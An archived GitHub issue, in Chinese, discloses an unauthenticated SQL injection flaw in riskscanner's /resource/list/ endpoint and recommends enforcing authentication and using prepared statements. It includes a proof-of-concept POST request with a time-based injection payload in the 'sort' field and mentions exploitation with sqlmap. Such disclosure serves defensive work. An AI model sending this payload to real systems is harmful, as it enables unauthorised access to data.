This repository has been archived by the owner on Apr 17, 2023. It is now read-only.
riskscanner安全漏洞 #21
Comments
maguohao2018
added
优先级:计划
状态:待处理
类型:bug
|
已完成,v1.4发布 |
|
close |
Sign up for free
to subscribe to this conversation on GitHub.
Already have an account?
Sign in.
在对riskscanner进行入网安全检测的时候。发现其在/resource/list/接口存在未授权获取数据安全漏洞
通过构造该接口的请求发现该接口存在sql注入漏洞。
构造poc
POST /resource/list/1/10 HTTP/1.1
Host: xxx
Content-Length: 41
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36
Content-Type: application/json;charset=UTF-8
{"sort":"1)a union select sleep(5) -- -"}
利用sqlmap工具进行利用
证明漏洞
修复建议。对接口进行强制鉴权。并在后端服务当中对sql语句进行预编译
The text was updated successfully, but these errors were encountered: